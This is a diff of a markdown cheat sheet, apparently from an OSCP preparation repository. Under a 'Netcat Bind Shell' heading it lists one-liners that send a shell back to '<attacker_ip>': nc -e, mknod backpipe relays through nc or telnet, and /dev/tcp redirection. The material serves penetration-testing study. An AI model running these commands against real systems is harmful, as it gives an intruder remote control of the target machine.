RihaMaheshwari/OSCP-Preparation-Material/Basics/Scans.md

 ```
 # Netcat Bind Shell
 a. nc <attacker_ip> <port> -e /bin/bash
-# When you don't have access to -e option of Netcat
+#  When the GAPING_SECURITY_HOLE is disabled, meaning you don't have access to -e option of Netcat.
-b.
-When the GAPING_SECURITY_HOLE is disabled, which means you don't have access to the '-e' option of netcat.Create a FIFO file system object and use it as a backpipe to relay standard output from commands piped from netcat to /bin/bash back into netcat.
+# Create a FIFO file system object and use it as a backpipe to relay standard output from commands piped from netcat to /bin/bash back into netcat.
 Sounds confusing right?
-The following image should clear things up.
 	1. mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
 c. /bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
 d. mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe